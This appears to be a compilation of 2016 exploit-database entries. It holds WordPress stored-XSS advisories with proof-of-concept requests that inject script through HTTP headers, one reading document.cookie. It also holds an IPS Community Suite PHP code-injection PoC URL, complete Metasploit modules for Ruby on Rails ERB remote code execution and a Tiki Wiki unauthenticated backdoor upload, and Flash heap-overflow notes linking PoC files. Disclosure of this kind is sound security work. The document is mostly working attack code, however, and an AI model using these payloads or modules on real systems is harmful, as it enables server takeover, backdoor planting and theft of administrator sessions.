All in One SEO Pack is reportedly the most downloaded plugin for WordPress. It allows users to automatically optimize their site for Search Engines. A stored Cross-Site Scripting vulnerability exists in the Bot Blocker functionality.
Details
A stored Cross-Site Scripting vulnerability exists in the Bot Blocker functionality of the All in One SEO Pack WordPress Plugin (1+ million active installs). Particularly interesting about this issue is that an anonymous user can simply store his XSS payload in the Admin dashboard by just visiting the public site with a malformed User Agent or Referrer header.
The SEO Pack Bot Blocker functionality can be used to prevent certain bots from accessing/crawling the website. Bots can be detected based on User Agent and Referrer header patterns. When the User Agent contains one of the pre-configured list of bot names like "Abonti", "Bullseye" or "Exabot" the request is blocked and a 404 is returned.
If the "Track Blocked Bots" setting is enabled (not by default), blocked request are logged in that HTML page without proper sanitization or output encoding, allowing XSS.
The affected resource: /all-in-one-seo-pack/modules/aioseop_bad_robots.php
if ( $this->option_isset( 'block_bots' ) ) {
if ( !$this->allow_bot() ) {
status_header( 503 );
$ip = $_SERVER['REMOTE_ADDR'];
-> $user_agent = $_SERVER['HTTP_USER_AGENT'];
-> $this->blocked_message( sprintf( __( "Blocked bot with IP %s -- matched user agent %s found in blocklist.",
-> 'all-in-one-seo-pack' ), $ip, $user_agent ) );
exit();
} elseif ( $this->option_isset( 'block_refer' ) && $this->is_bad_referer() ) {
status_header( 503 );
$ip = $_SERVER['REMOTE_ADDR'];
-> $referer = $_SERVER['HTTP_REFERER'];
-> $this->blocked_message( sprintf( __( "Blocked bot with IP %s -- matched referer %s found in blocklist.",
-> 'all-in-one-seo-pack' ), $ip, $referer ) );
}
}
The resulting HTML code:
<span class="aioseop_option_input"><div class="aioseop_option_div" ><pre>2016-07-05 18:59:37 Blocked bot with IP 172.16.232.1 -- matched user agent Abonti </pre><script>alert(1);</script>found in blocklist.
Proof of concept
1/ Go to the "Bad Bot Blocker" settings page in All in one SEO menu.
2/ Enable "Block Bad Bots using HTTP" and/or "Block Referral Spam using HTTP".
3/ Send exploit request (with payload in referer or user-agent) to the server. Anywhere. Make sure to send your exploit request as an anonymous user. When you are logged in (have cookies), you are never seen as a bot.
4/ If all set up ok, your request will be blocked (HTTP/1.1 503 Service Unavailable)
5/ Open the "Bad Bot Blocker" settings page as WP admin.
6/ Your payload will run, since it is logged in a <pre> tag.
Potential use "Track Blocked Bots" setting to show/hide the <pre> block. Not needed for payload to run. Payload can be set in User-Agent or Referer field
REQUEST:
GET / HTTP/1.1
Host: 172.16.232.130
User-Agent: Abonti </pre><script>alert(1);</script>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://172.16.232.130/</pre><script>alert(1);</script>
Connection: close
Cache-Control: max-age=0
RESPONSE:
HTTP/1.1 503 Service Unavailable
Date: Tue, 05 Jul 2016 19:31:19 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
Persistent Cross-Site Scripting in WordPress Activity Log plugin
Han Sahin
Abstract
A stored Cross-Site Scripting (XSS) vulnerability has been found in the WordPress Activity Log plugin. By using this vulnerability an attacker can inject malicious JavaScript code into the application, which will execute within the browser of any user who views the Activity Log, in general WP admin.
Tested versions
This issue was successfully tested on WordPress Activity Log plugin version 2.3.1.
Fix
This issue has been fixed in version 2.3.2 of the WordPress Activity Log plugin. The updated plugin can be downloaded from the following location: https://downloads.wordpress.org/plugin/aryo-activity-log.2.3.2.zip.
Introduction
The WordPress Activity Log plugin allows monitoring and tracking of site activity on a WordPress site. A stored Cross-Site Scripting vulnerability has been discovered in the WordPress Activity Log plugin which allows an unauthenticated attacker to inject malicious JavaScript code into the application, which will execute within the browser of any user who views the Activity Log (WP admin).
Details
The WordPress Activity Log plugin fails to sufficiently check input supplied to the X-Forwarded-For HTTP header and perform output encoding when the input is presented in a "wrong password event". As a result the malicious request will be stored in the Activity Log page, executing the payload when an unsuspecting user views this specific page.
An attacker can use this vulnerability to perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes or deliver malware.
Persistent Cross-Site scripting flaws are typically more serious than reflected vulnerabilities because they do not require a separate delivery mechanism in order to reach target users (victims).
Proof of concept
This vulnerability can be demonstrated by submitting an XFF header similar to the following:
POST /wp-login.php HTTP/1.1
Host: 192.168.28.135
Content-Length: 113
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,nl;q=0.6
X-Forwarded-For: <script>alert(document.cookie);</script>
Connection: close
log=wordpress&pwd=sdsdssdsdsd&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.28.135%2Fwp-admin%2F&testcookie=1
---------------------------------------------------------------------------
IPS Community Suite <= 4.1.12.3 Autoloaded PHP Code Injection Vulnerability
---------------------------------------------------------------------------
[-] Software Link:
https://invisionpower.com/
[-] Affected Versions:
Version 4.1.12.3 and prior versions.
[-] Vulnerability Description:
The vulnerable code is located in the /applications/core/modules/front/system/content.php script:
38. $class = 'IPS\\' . implode( '\\', explode( '_', \IPS\Request::i()->content_class ) );
39.
40. if ( ! class_exists( $class ) or ! in_array( 'IPS\Content', class_parents( $class ) ) )
41. {
42. \IPS\Output::i()->error( 'node_error', '2S226/2', 404, '' );
43. }
User input passed through the "content_class" request parameter is not properly sanitized before being used in a call
to the "class_exists()" function at line 40. This could be exploited by unauthenticated attackers to inject and execute
arbitrary PHP code leveraging the autoloading function defined into the /applications/cms/Application.php script:
171. if ( mb_substr( $class, 0, 14 ) === 'IPS\cms\Fields' and is_numeric( mb_substr( $class, 14, 1 ) ) )
172. {
173. $databaseId = mb_substr( $class, 14 );
174. eval( "namespace IPS\\cms; class Fields{$databaseId} extends Fields { public static \$customDatabaseId [...]
175. }
Successful exploitation of this vulnerability requires the application running on PHP before version 5.4.24 or 5.5.8.
[-] Proof of Concept:
http://[host]/[ips]/index.php?app=core&module=system&controller=content&do=find&content_class=cms\Fields1{}phpinfo();/*
[-] Solution:
Update to version 4.1.13 or later.
[-] Disclosure Timeline:
[04/07/2016] - Vendor notified
[05/07/2016] - Vulnerability fixed in version 4.1.13: https://invisionpower.com/release-notes/4113-r44/
[06/07/2016] - CVE number requested
[06/07/2016] - CVE number assigned
[07/07/2016] - Public disclosure
[-] CVE Reference:
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2016-6174 to this vulnerability.
[-] Credits:
Vulnerability discovered by Egidio Romano.
[-] Original Advisory:
http://karmainsecurity.com/KIS-2016-11
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Ruby on Rails ActionPack Inline ERB Code Execution',
'Description' => %q{
This module exploits a remote code execution vulnerability in the
inline request processor of the Ruby on Rails ActionPack component.
This vulnerability allows an attacker to process ERB to the inline
JSON processor, which is then rendered, permitting full RCE within
the runtime, without logging an error condition.
},
'Author' =>
[
'RageLtMan <rageltman[at]sempervictus>'
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2016-2098' ]
],
'Platform' => 'ruby',
'Arch' => ARCH_RUBY,
'Privileged' => false,
'Targets' => [ ['Automatic', {} ] ],
'DisclosureDate' => 'Mar 1 2016',
'DefaultOptions' => {
"PrependFork" => true
},
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(80),
OptString.new('TARGETURI', [ true, 'The path to a vulnerable Ruby on Rails application', "/"]),
OptString.new('TARGETPARAM', [ true, 'The target parameter to inject with inline code', 'id'])
], self.class)
end
def json_request
code = Rex::Text.encode_base64(payload.encoded)
return {
datastore['TARGETPARAM'] => {"inline" => "<%= eval(%[#{code}].unpack(%[m0])[0]) %>"}
}.to_json
end
def exploit
print_status("Sending inline code to parameter: #{datastore['TARGETPARAM']}")
send_request_cgi({
'uri' => normalize_uri(target_uri.path),
'method' => 'GET',
'ctype' => 'application/json',
'headers' => {
'Accept' => 'application/json'
},
'data' => json_request
}, 25)
end
end
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Tiki Wiki Unauthenticated File Upload Vulnerability',
'Description' => %q{
This module exploits a file upload vulnerability in Tiki Wiki <= 15.1
which could be abused to allow unauthenticated users to execute arbitrary code
under the context of the webserver user.
The issue comes with one of the 3rd party components. Name of that components is
ELFinder -version 2.0-. This components comes with default example page which
demonstrates file operations such as upload, remove, rename, create directory etc.
Default configuration does not force validations such as file extension, content-type etc.
Thus, unauthenticated user can upload PHP file.
The exploit has been tested on Debian 8.x 64bit and Tiki Wiki 15.1.
},
'Author' =>
[
'Mehmet Ince <mehmet@mehmetince.net>' # Vulnerability discovery and Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'https://www.mehmetince.net/exploit/tiki-wiki-unauthenticated-file-upload-vulnerability' ],
[ 'URL', 'https://tiki.org/article434-Security-update-Tiki-15-2-Tiki-14-4-and-Tiki-12-9-released' ]
],
'Privileged' => false,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Payload' =>
{
'DisableNops' => true
},
'Targets' => [ ['Automatic', {}] ],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jul 11 2016'
))
register_options(
[
OptString.new('TARGETURI', [ true, "Installed path of Tiki Wiki", "/tiki/"])
], self.class)
end
def check
url = normalize_uri(target_uri.path, "vendor_extra/elfinder/elfinder.html")
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(url)
)
if res && res.code == 200
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Safe
end
def exploit
filename = rand_text_alpha(8 + rand(4)) + '.php'
data = Rex::MIME::Message.new
data.add_part('upload', nil, nil, 'form-data; name="cmd"')
data.add_part('l1_Lw', nil, nil, 'form-data; name="target"')
data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"upload[]\"; filename=\"#{filename}\"")
print_status("Uploading backdoor file.")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "vendor_extra/elfinder/php/connector.minimal.php"),
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => data.to_s
})
if res && res.code == 200
print_good("Backdoor successfully created.")
else
fail_with(Failure::Unknown, "#{peer} - Error on uploading file")
end
print_status("Trigging the exploit...")
send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "vendor_extra/elfinder/files/" + filename)
}, 5)
end
end
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=793
There is a heap overflow in ATF impage packing. To reproduce the issue, load the attach file '129' using LoadImage.swf as follows:
LoadImage.swf?img=129
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40090.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=790
Loading the attached image causes heap corruption due to LMZA property decoding. To reproduce the issue, load the attach file '6' using LoadImage.swf as follows:
LoadImage.swf?img=6
The issue sometimes takes multiple refreshes to crash
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40089.zip